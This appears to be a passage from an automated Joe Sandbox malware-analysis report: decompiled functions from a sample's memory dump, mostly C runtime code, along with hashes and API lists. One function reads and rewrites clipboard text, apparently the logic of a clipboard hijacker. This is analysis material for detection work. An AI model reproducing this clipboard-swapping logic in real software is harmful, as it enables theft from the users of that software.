Instruction ID: 7796218e777258ddd2f706b446f957078412b9944a54cef5b60383a6c07f531d
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 45F06231100710ABDB203BF9988DAAA76F9AF4A724F204568F642D15C0DA70EC458E71

Uniqueness

Uniqueness Score: -1.00%

Function 00412F35 Relevance: 3.0, APIs: 2, Instructions: 35
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E00412F35(intOrPtr __eax, intOrPtr __ebx, intOrPtr __edx, void* __edi, intOrPtr __esi, intOrPtr _a4) {
				signed int* _v4;
				void* __ebp;
				void* _t12;
				int _t13;
				signed int* _t17;
				signed int _t20;
				signed int _t21;
				void* _t28;

				_t24 = __esi;
				_t22 = __edx;
				_t16 = __ebx;
				if( *0x443040 == 0) {
					__eflags = E00427A7D();
					if(__eflags != 0) {
						_push(0x16);
						E00427AC2(__ebx, __edx, __edi, __esi, __eflags);
					}
					__eflags =  *0x4431b0 & 0x00000002;
					if(( *0x4431b0 & 0x00000002) != 0) {
						_t13 = IsProcessorFeaturePresent(0x17);
						__eflags = _t13;
						if(_t13 != 0) {
							_push(7);
							asm("int 0x29");
						}
						E00417E53(_t16, _t22, _t24, 3, 0x40000015, 1);
						_t28 = _t28 + 0xc;
					}
					E0041E282(3);
					asm("int3");
					_t17 = _v4;
					_t12 = 0;
					__eflags =  *_t17;
					if( *_t17 != 0) {
						while(1) {
							__eflags = _t12 - _a4;
							if(_t12 == _a4) {
								goto L12;
							}
							_t12 = _t12 + 1;
							__eflags =  *((char*)(_t12 + _t17));
							if( *((char*)(_t12 + _t17)) != 0) {
								continue;
							}
							goto L12;
						}
					}
					L12:
					return _t12;
				} else {
					__imp__EncodePointer(_a4);
					_t20 =  *0x443040; // 0x9
					_t21 = _t20 - 1;
					 *0x443040 = _t21;
					 *((intOrPtr*)(0x4443a4 + _t21 * 4)) = __eax;
					return __eax;
				}
			}

0x00412f35
0x00412f35
0x00412f35
0x00412f3f
0x0041d1ce
0x0041d1d0
0x0041d1d2
0x0041d1d4
0x0041d1d9
0x0041d1da
0x0041d1e1
0x0041d1e5
0x0041d1eb
0x0041d1ed
0x0041d1ef
0x0041d1f2
0x0041d1f2
0x0041d1fd
0x0041d202
0x0041d202
0x0041d207
0x0041d20c
0x0041d212
0x0041d215
0x0041d217
0x0041d219
0x0041d21b
0x0041d21b
0x0041d21e
0x00000000
0x00000000
0x0041d220
0x0041d221
0x0041d225
0x00000000
0x00000000
0x00000000
0x0041d225
0x0041d21b
0x0041d228
0x0041d228
0x00412f45
0x00412f48
0x00412f4e
0x00412f54
0x00412f55
0x00412f5b
0x00412f63
0x00412f63

APIs

RtlEncodePointer.NTDLL(?,?,00412805,0041284B,?,00412692,00000000,00000000,00000000,00000004,0040356C,00000001,35200185,?,?,004314D0), ref: 00412F48
IsProcessorFeaturePresent.KERNEL32(00000017,00417E52,?,00417DC1,?,00000016,00417FD0,?,?,?,?,?,00000000,?,?,?), ref: 0041D1E5

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: EncodeFeaturePointerPresentProcessor
String ID:
API String ID: 4030241255-0
Opcode ID: 6eca7e34881e82b6d2a9032cfd5fffcc2573d740208f39ec2c3c5302838dbfb6
Instruction ID: 71809bd5bdf5530853f67bde16b54822b6a1af32fd73506e62925f4ebafa984f
Opcode Fuzzy Hash: 6eca7e34881e82b6d2a9032cfd5fffcc2573d740208f39ec2c3c5302838dbfb6
Instruction Fuzzy Hash: DBF0E9B8688305BAE7146F15BC0BBA63BA46B11F1AF04007EF909651E7EB794780C51C

Uniqueness

Uniqueness Score: -1.00%

Function 00421955 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00421955(void* _a4) {
				char _t3;
				intOrPtr _t5;
				intOrPtr* _t6;

				if(_a4 != 0) {
					_t3 = RtlFreeHeap( *0x444f1c, 0, _a4); // executed
					if(_t3 == 0) {
						_t5 = E0041C9B6(GetLastError());
						_t6 = E0041CA53();
						 *_t6 = _t5;
						return _t6;
					}
				}
				return _t3;
			}

0x0042195e
0x0042196b
0x00421973
0x0042197d
0x00421985
0x0042198a
0x00000000
0x0042198c
0x00421973
0x0042198e

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,0042A0CD,00000000,00000000,00000000,?,0042A36E,00000000,00000007,00000000,?,0042A867,00000000,00000000), ref: 0042196B
GetLastError.KERNEL32(00000000,?,0042A0CD,00000000,00000000,00000000,?,0042A36E,00000000,00000007,00000000,?,0042A867,00000000,00000000), ref: 00421976

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: dcde57b0990e1f4e9072756eb11073614cdf93dbe79977425675ace205ea457d
Instruction ID: c0c939cfa545bbd4bb54645d629c2fc0b704d5f1bcbd08687294aa7a724605f6
Opcode Fuzzy Hash: dcde57b0990e1f4e9072756eb11073614cdf93dbe79977425675ace205ea457d
Instruction Fuzzy Hash: 27E08C72200214ABCB212FA5BD08B8A7BA89F40796F114026F60C862B0DA3999C0CBCC

Uniqueness

Uniqueness Score: -1.00%

Function 00407F70 Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00407F70(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t32;
				intOrPtr _t37;
				intOrPtr* _t42;
				intOrPtr* _t44;
				void* _t47;
				char _t48;
				intOrPtr* _t51;
				intOrPtr* _t53;
				void* _t62;
				void* _t63;
				void* _t65;
				intOrPtr _t66;
				signed int _t68;
				void* _t73;

				_t73 = __eflags;
				_t32 =  *0x443048; // 0x35200185
				 *[fs:0x0] =  &_v16;
				_t63 = __ecx;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0x201;
				 *((intOrPtr*)(__ecx + 0x18)) = 6;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				E00403A00(_t47, __ecx, 0);
				_t66 = E0041362C(_t47, __ecx, _t65, _t73, 8);
				asm("xorps xmm0, xmm0");
				asm("movq [esi], xmm0");
				_v8 = 0;
				_t37 = E00412660(_t47, _t63, _t66, _t73); // executed
				 *((intOrPtr*)(_t66 + 4)) = _t37;
				 *((intOrPtr*)(_t63 + 0x30)) = _t66;
				 *((intOrPtr*)(_t63 + 0x38)) = _a4;
				 *((intOrPtr*)(_t63 + 0x3c)) = 0;
				_t51 =  *((intOrPtr*)(_t66 + 4));
				_v20 = _t51;
				 *((intOrPtr*)( *_t51 + 4))(1, 0, _t32 ^ _t68, _t62, _t65, _t47,  *[fs:0x0], 0x431b1d, 0xffffffff);
				_v8 = 1;
				_t42 = E00408230(_t47,  &_v24); // executed
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *_t42 + 0x20))))(0x20);
				_v8 = 0xffffffff;
				_t48 = _t44;
				_t53 = _v20;
				if(_t53 != 0) {
					_t44 =  *((intOrPtr*)( *_t53 + 8))();
					if(_t44 != 0) {
						_t44 =  *((intOrPtr*)( *_t44))(1);
					}
				}
				 *((char*)(_t63 + 0x40)) = _t48;
				if( *((intOrPtr*)(_t63 + 0x38)) == 0) {
					_push(0);
					_t44 = E00403A00(_t48, _t63,  *(_t63 + 0xc) | 0x00000004);
				}
				 *[fs:0x0] = _v16;
				return _t44;
			}

0x00407f70
0x00407f87
0x00407f92
0x00407f98
0x00407f9e
0x00407fa5
0x00407fac
0x00407fb3
0x00407fba
0x00407fc1
0x00407fc8
0x00407fcf
0x00407fd6
0x00407fdd
0x00407fe4
0x00407ff0
0x00407ff2
0x00407ff5
0x00407ffb
0x00408002
0x00408007
0x00408010
0x00408013
0x00408016
0x0040801d
0x00408020
0x00408025
0x0040802b
0x00408033
0x00408044
0x00408046
0x0040804d
0x0040804f
0x00408054
0x00408058
0x0040805d
0x00408065
0x00408065
0x0040805d
0x0040806b
0x0040806e
0x00408075
0x0040807b
0x0040807b
0x00408083
0x00408091

APIs

Part of subcall function 00403A00: ___std_exception_copy.LIBVCRUNTIME ref: 00403A9F

std::locale::_Init.LIBCPMT ref: 00408002

Part of subcall function 00412660: __EH_prolog3.LIBCMT ref: 00412667
Part of subcall function 00412660: std::_Lockit::_Lockit.LIBCPMT ref: 00412672
Part of subcall function 00412660: std::locale::_Setgloballocale.LIBCPMT ref: 0041268D
Part of subcall function 00412660: _Yarn.LIBCPMT ref: 004126A3
Part of subcall function 00412660: std::_Lockit::~_Lockit.LIBCPMT ref: 004126E3

Part of subcall function 00408230: std::_Lockit::_Lockit.LIBCPMT ref: 00408266
Part of subcall function 00408230: std::_Lockit::_Lockit.LIBCPMT ref: 00408289
Part of subcall function 00408230: std::_Lockit::~_Lockit.LIBCPMT ref: 004082A9
Part of subcall function 00408230: std::_Lockit::~_Lockit.LIBCPMT ref: 00408333

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$std::locale::_$H_prolog3InitSetgloballocaleYarn___std_exception_copy
String ID:
API String ID: 2837286730-0
Opcode ID: 2b0f6ad451beec99d2bd0fd1f19ce97eff28aa21e7a4a934aca0143eea244172
Instruction ID: 5c9de59e41498ad39f685fdc9ea81034a62a864096537487ad654ab263d0b571
Opcode Fuzzy Hash: 2b0f6ad451beec99d2bd0fd1f19ce97eff28aa21e7a4a934aca0143eea244172
Instruction Fuzzy Hash: 4E318EB0600605AFE700DF65C959B4ABBF4FF44718F10422EE4159BBC0D7BAA968CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 00425DFF Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00425DFF(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t26;

				E00425BD5(__ecx,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L3:
					return 0;
				} else {
					_t26 = E0042E707( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t26 != 0) {
						goto L3;
					} else {
						 *0x444858 =  *0x444858 + 1;
						asm("lock or [eax], ecx");
						 *((intOrPtr*)(_a16 + 8)) = 0;
						 *((intOrPtr*)(_a16 + 0x1c)) = 0;
						 *((intOrPtr*)(_a16 + 4)) = 0;
						 *_a16 = 0;
						 *((intOrPtr*)(_a16 + 0x10)) = _v8;
						return _a16;
					}
				}
			}

0x00425e10
0x00425e1c
0x00425e1d
0x00425e1e
0x00425e25
0x00425e7e
0x00425e81
0x00425e27
0x00425e39
0x00425e43
0x00000000
0x00425e45
0x00425e48
0x00425e54
0x00425e5c
0x00425e62
0x00425e68
0x00425e6e
0x00425e76
0x00425e7d
0x00425e7d
0x00425e43

APIs

__wsopen_s.LIBCMT ref: 00425E39

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: b44f4f7407b48a802bd2c702554a7916618dbcc2df1fba91728dd1af531ddf05
Instruction ID: 7db6a8036cf9c55afa674b204bd79a168285c7ee609ac75982f632ddfeab5a45
Opcode Fuzzy Hash: b44f4f7407b48a802bd2c702554a7916618dbcc2df1fba91728dd1af531ddf05
Instruction Fuzzy Hash: 98112A75A0410AAFCF05DF59E94199B7BF5EF48304F1540AAF805EB351D634EE11CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00421D39 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00421D39(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0041CA53())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x444f1c, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0041FB58();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E0041FBA3(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00421d3f
0x00421d45
0x00421d77
0x00421d7c
0x00421d82
0x00000000
0x00421d82
0x00421d49
0x00421d4b
0x00421d4b
0x00421d62
0x00421d6b
0x00421d73
0x00000000
0x00000000
0x00421d53
0x00421d55
0x00000000
0x00000000
0x00421d58
0x00421d5e
0x00421d60
0x00000000
0x00000000
0x00421d60
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0041465B,?,?,?,?,?,00402EC7,?,?,?), ref: 00421D6B

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b90c3639d89196f7415b1e5ddaf506038d920dfc196135e14af2af2aa13ca5c3
Instruction ID: e41402c04db4bb6d9732386b824abf81ca3506d721ef2a0627249ce3b05f17f2
Opcode Fuzzy Hash: b90c3639d89196f7415b1e5ddaf506038d920dfc196135e14af2af2aa13ca5c3
Instruction Fuzzy Hash: F2E0E531315630D6D7312662BC04B9B364C8F623A1FD50027AC54962B0CB6CFC4241ED

Uniqueness

Uniqueness Score: -1.00%

Function 0042E3E0 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042E3E0(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}

0x0042e3fd
0x0042e404

APIs

CreateFileW.KERNELBASE(?,00000000,?,0042E7D0,?,?,00000000,?,0042E7D0,?,0000000C), ref: 0042E3FD

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c6c67b73b85157684baddafc9f1c0358a7fbbbd9eca74e4c20464c5f364c8c4d
Instruction ID: cc0b132004d303e3d2635d1dc79cbc5594d43187f68baabfeda04fd37ae21548
Opcode Fuzzy Hash: c6c67b73b85157684baddafc9f1c0358a7fbbbd9eca74e4c20464c5f364c8c4d
Instruction Fuzzy Hash: 7CD06C3200010DBBDF028F84DD06EDA3BAAFB48714F114010FA1866020C736E921AB94

Uniqueness

Uniqueness Score: -1.00%

Function 006A900D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006A905E

Memory Dump Source

Source File: 00000006.00000002.574270691.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006A8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6a8000_C676.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 6019e0fe424b330b81bcc226b15a61878893f0d5f8d6fb4cc52173de1a15773c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 05113C79A00208EFDB01DF98C985E98BBF5AF09350F158094F9489B362D771EE50DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402830 Relevance: 40.8, APIs: 22, Strings: 1, Instructions: 553
COMMONCrypto

Download Yara Rule

C-Code - Quality: 47%

			E00402830(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				struct HWND__* _v40;
				struct HWND__* _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				intOrPtr _v64;
				char _v100;
				signed int _v104;
				intOrPtr _v132;
				signed int _t109;
				signed int _t126;
				void* _t127;
				signed int _t130;
				signed int _t132;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t149;
				signed int _t151;
				signed int _t152;
				signed int _t154;
				signed int _t162;
				signed int _t165;
				signed int _t173;
				signed int _t176;
				signed int _t177;
				signed int _t181;
				signed int _t182;
				unsigned int _t184;
				void* _t185;
				signed int _t199;
				signed int _t201;
				void* _t203;
				signed int _t206;
				signed int _t210;
				void* _t211;
				int _t213;
				signed int _t217;
				signed int _t221;
				signed int _t224;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t235;
				struct HWND__* _t239;
				int* _t240;
				struct HWND__* _t242;
				void* _t247;
				signed int _t250;
				signed int _t251;
				void* _t254;
				void* _t255;
				void* _t258;
				signed int _t261;
				signed int _t262;
				signed int _t264;
				signed int _t269;
				void* _t270;
				signed int _t273;
				intOrPtr _t275;
				void* _t276;
				signed int _t281;
				void* _t284;
				void* _t285;
				void* _t286;
				signed int _t288;
				signed int _t290;
				void* _t296;
				void* _t297;
				void* _t298;
				signed int _t299;

				_t268 = __esi;
				_t249 = __edx;
				_t209 = __ebx;
				_t284 = _t296;
				_t297 = _t296 - 8;
				_push(__edi);
				_t254 = _a8;
				_t109 = __ecx;
				_t221 = _a4;
				_v8 = __ecx;
				_v12 = _t221;
				if(_t254 > 0x7fffffff) {
					E00401BD0(__ebx, _t221, __edx);
					goto L15;
				} else {
					 *(__ecx + 0x14) = 0xf;
					if(_t254 >= 0x10) {
						_push(__ebx);
						_push(__esi);
						_t281 = _t254 | 0x0000000f;
						__eflags = _t281 - 0x7fffffff;
						if(_t281 <= 0x7fffffff) {
							__eflags = _t281 - 0x16;
							_t268 =  <  ? 0x16 : _t281;
							_t221 = _t268 + 1;
							__eflags = _t221 - 0x1000;
							if(_t221 < 0x1000) {
								__eflags = _t221;
								if(__eflags == 0) {
									_t217 = 0;
									__eflags = 0;
								} else {
									_t217 = E0041362C(__ebx, _t254, _t268, __eflags, _t221);
									_t297 = _t297 + 4;
									_t109 = _v8;
								}
								goto L13;
							} else {
								_t11 = _t221 + 0x23; // 0x23
								_t205 = _t11;
								__eflags = _t11 - _t221;
								if(__eflags <= 0) {
									L15:
									E00401B30();
									goto L16;
								} else {
									goto L5;
								}
							}
						} else {
							_t268 = 0x7fffffff;
							_t205 = 0xffffffff80000023;
							__eflags = 0x80000000;
							L5:
							_t206 = E0041362C(_t209, _t254, _t268, __eflags, _t205);
							_t297 = _t297 + 4;
							__eflags = _t206;
							if(_t206 == 0) {
								L16:
								E0041805F(_t209, _t221, _t249);
								asm("int3");
								asm("int3");
								_push(_t284);
								_t285 = _t297;
								_t298 = _t297 - 0x10;
								_push(_t209);
								_t210 = _t221;
								_v32 = _v0;
								_t222 = 0x7fffffff;
								_push(_t268);
								_t250 =  *((intOrPtr*)(_t210 + 0x10));
								_t269 = _v8;
								_v20 = _t250;
								_push(_t254);
								__eflags = 0x7fffffff - _t250 - _t269;
								if(0x7fffffff - _t250 < _t269) {
									E00401BD0(_t210, 0x7fffffff, _t250);
									goto L38;
								} else {
									_t182 = _t250 + _t269;
									_t269 =  *(_t210 + 0x14);
									_v16 = _t182;
									_t261 = _t182 | 0x0000000f;
									_v20 = _t269;
									__eflags = _t261 - 0x7fffffff;
									if(_t261 <= 0x7fffffff) {
										_t184 = _t269 >> 1;
										_t222 = 0x7fffffff - _t184;
										__eflags = _t269 - _t222;
										if(_t269 <= _t222) {
											_t185 = _t184 + _t269;
											__eflags = _t261 - _t185;
											_t254 =  <  ? _t185 : _t261;
											_t29 = _t254 + 1; // 0x80000000
											_t222 = _t29;
											__eflags = _t222 - 0x1000;
											if(_t222 < 0x1000) {
												__eflags = _t222;
												if(__eflags == 0) {
													_t269 = 0;
													__eflags = 0;
												} else {
													_t199 = E0041362C(_t210, _t254, _t269, __eflags, _t222);
													_t250 = _v12;
													_t298 = _t298 + 4;
													_t269 = _t199;
												}
												goto L31;
											} else {
												_t30 = _t222 + 0x23; // 0x80000023
												_t200 = _t30;
												__eflags = _t30 - _t222;
												if(__eflags <= 0) {
													L38:
													E00401B30();
													goto L39;
												} else {
													goto L21;
												}
											}
										} else {
											_t254 = 0x7fffffff;
											goto L20;
										}
									} else {
										_t254 = 0x7fffffff;
										L20:
										_t200 = 0xffffffff80000023;
										__eflags = 0x80000000;
										L21:
										_t201 = E0041362C(_t210, _t254, _t269, __eflags, _t200);
										_t298 = _t298 + 4;
										__eflags = _t201;
										if(_t201 == 0) {
											L39:
											E0041805F(_t210, _t222, _t250);
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t285);
											_t286 = _t298;
											_t299 = _t298 - 0x10;
											_t251 = _v24;
											asm("xorps xmm0, xmm0");
											_push(_t210);
											_t211 = _t222;
											_v56 = _v28;
											_t224 = _v16 + _t251;
											_push(_t269);
											_t270 = 0xf;
											_v48 = _t251;
											_v60 = _v20;
											_v52 = _t224;
											asm("movups [ebx], xmm0");
											 *(_t211 + 0x10) = 0;
											 *(_t211 + 0x14) = 0;
											_push(_t254);
											_t255 = _t211;
											__eflags = _t224 - 0xf;
											if(_t224 <= 0xf) {
												L52:
												 *(_t211 + 0x10) = _t224;
												 *(_t211 + 0x14) = _t270;
												E00414BF0(_t255, _v24, _t251);
												__eflags = _t255 + _v16;
												E00414BF0(_t255 + _v16, _v28, _a16);
												 *((char*)(_t255 + _v20)) = 0;
												return _t211;
											} else {
												_t273 = _t224 | 0x0000000f;
												__eflags = _t273 - 0x7fffffff;
												if(_t273 <= 0x7fffffff) {
													__eflags = _t273 - 0x16;
													_t270 =  <  ? 0x16 : _t273;
													_t126 = _t270 + 1;
													__eflags = _t126 - 0x1000;
													if(_t126 < 0x1000) {
														__eflags = _t126;
														if(__eflags == 0) {
															_t255 = 0;
															__eflags = 0;
														} else {
															_t127 = E0041362C(_t211, _t255, _t270, __eflags, _t126);
															_t224 = _v20;
															_t299 = _t299 + 4;
															_t251 = _v16;
															_t255 = _t127;
														}
														goto L51;
													} else {
														_t65 = _t126 + 0x23; // 0x23
														_t227 = _t65;
														__eflags = _t65 - _t126;
														if(__eflags <= 0) {
															E00401B30();
															goto L54;
														} else {
															goto L43;
														}
													}
												} else {
													_t270 = 0x7fffffff;
													_t227 = 0xffffffff80000023;
													__eflags = 0x80000000;
													L43:
													_t181 = E0041362C(_t211, _t255, _t270, __eflags, _t227);
													_t299 = _t299 + 4;
													__eflags = _t181;
													if(_t181 == 0) {
														L54:
														E0041805F(_t211, _t227, _t251);
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_push(_t286);
														_t288 = _t299;
														_push(_t211);
														_push(_t270);
														_push(_t255);
														_t130 = OpenClipboard(0);
														__eflags = _t130;
														if(_t130 == 0) {
															L67:
															_t213 = 0;
															__eflags = 0;
														} else {
															_t165 = EmptyClipboard();
															__eflags = _t165;
															if(_t165 != 0) {
																_t255 = GlobalAlloc(0x2000, _a8 + 1);
																__eflags = _t255;
																if(_t255 != 0) {
																	_t270 = GlobalLock(_t255);
																	__eflags = _t270;
																	if(_t270 != 0) {
																		__eflags = _a12 - 0x10;
																		_t244 =  >=  ? _v8 :  &_v8;
																		E00414BF0(_t270,  >=  ? _v8 :  &_v8, _a8 + 1);
																		_t299 = _t299 + 0xc;
																		_t173 = GlobalUnlock(_t255);
																		__eflags = _t173;
																		if(_t173 == 0) {
																			L66:
																			CloseClipboard();
																			GlobalFree(_t270);
																			goto L67;
																		} else {
																			_t176 = SetClipboardData(1, _t255);
																			__eflags = _t176;
																			if(_t176 == 0) {
																				goto L66;
																			} else {
																				_t177 = CloseClipboard();
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L67;
																				} else {
																					_t213 = 1;
																				}
																			}
																		}
																	} else {
																		CloseClipboard();
																		goto L67;
																	}
																} else {
																	CloseClipboard();
																	goto L67;
																}
															} else {
																CloseClipboard();
																goto L67;
															}
														}
														_t228 = _a12;
														__eflags = _t228 - 0x10;
														if(_t228 < 0x10) {
															L72:
															return _t213;
														} else {
															_t252 = _v8;
															_t229 = _t228 + 1;
															_t132 = _v8;
															__eflags = _t229 - 0x1000;
															if(_t229 < 0x1000) {
																L71:
																_push(_t229);
																E004138AD(_t252);
																goto L72;
															} else {
																_t252 =  *(_t132 - 4);
																_t229 = _t229 + 0x23;
																__eflags = _t132 - _t252 + 0xfffffffc - 0x1f;
																if(_t132 - _t252 + 0xfffffffc > 0x1f) {
																	E0041805F(_t213, _t229, _t252);
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_push(_t288);
																	_t290 = _t299;
																	_push(0xffffffff);
																	_push(0x43145d);
																	_push( *[fs:0x0]);
																	_t138 =  *0x443048; // 0x35200185
																	_t139 = _t138 ^ _t290;
																	_v104 = _t139;
																	_push(_t270);
																	_push(_t255);
																	_push(_t139);
																	 *[fs:0x0] =  &_v100;
																	_t275 = _t229;
																	_v132 = _t275;
																	_v132 = _t275;
																	_t141 = OpenClipboard(0);
																	__eflags = _t141;
																	if(_t141 == 0) {
																		L77:
																		asm("xorps xmm0, xmm0");
																		asm("movups [esi], xmm0");
																		_push(0);
																		 *(_t275 + 0x10) = 0;
																		_push(0x43e90c);
																		 *(_t275 + 0x14) = 0;
																		E00402830(_t213, _t275, _t252, _t255, _t275);
																		goto L92;
																	} else {
																		_t255 = GetClipboardData(1);
																		__eflags = _t255;
																		if(_t255 != 0) {
																			_t252 = GlobalLock(_t255);
																			__eflags = _t252;
																			if(_t252 == 0) {
																				goto L76;
																			} else {
																				_t235 = _t252;
																				_v44 = 0;
																				asm("xorps xmm0, xmm0");
																				_v40 = 0;
																				asm("movups [ebp-0x28], xmm0");
																				_t92 = _t235 + 1; // 0x1
																				_v64 = _t92;
																				do {
																					_t149 =  *_t235;
																					_t235 = _t235 + 1;
																					__eflags = _t149;
																				} while (_t149 != 0);
																				_push(_t235 - _v64);
																				_push(_t252);
																				E00402830(_t213,  &_v60, _t252, _t255, _t275);
																				_v24 = 0;
																				_t151 = GlobalUnlock(_t255);
																				__eflags = _t151;
																				if(_t151 != 0) {
																					_t152 = CloseClipboard();
																					asm("xorps xmm0, xmm0");
																					asm("movups [esi], xmm0");
																					 *(_t275 + 0x10) = 0;
																					 *(_t275 + 0x14) = 0;
																					__eflags = _t152;
																					if(_t152 != 0) {
																						asm("movups xmm0, [ebp-0x28]");
																						asm("movups [esi], xmm0");
																						asm("movq xmm0, [ebp-0x18]");
																						asm("movq [esi+0x10], xmm0");
																						goto L92;
																					} else {
																						_push(_t152);
																						_push(0x43e90c);
																						E00402830(_t213, _t275, _t252, _t255, _t275);
																						_t239 = _v40;
																						__eflags = _t239 - 0x10;
																						if(_t239 < 0x10) {
																							goto L92;
																						} else {
																							_t252 = _v60;
																							_t240 = _t239 + 1;
																							_t154 = _v60;
																							__eflags = _t240 - 0x1000;
																							if(_t240 < 0x1000) {
																								goto L85;
																							} else {
																								_t252 =  *(_t154 - 4);
																								_t240 =  &(_t240[8]);
																								__eflags = _t154 - _t252 + 0xfffffffc - 0x1f;
																								if(_t154 - _t252 + 0xfffffffc > 0x1f) {
																									goto L93;
																								} else {
																									goto L85;
																								}
																							}
																						}
																					}
																				} else {
																					CloseClipboard();
																					asm("xorps xmm0, xmm0");
																					_push(0);
																					asm("movups [esi], xmm0");
																					_push(0x43e90c);
																					 *(_t275 + 0x10) = 0;
																					 *(_t275 + 0x14) = 0;
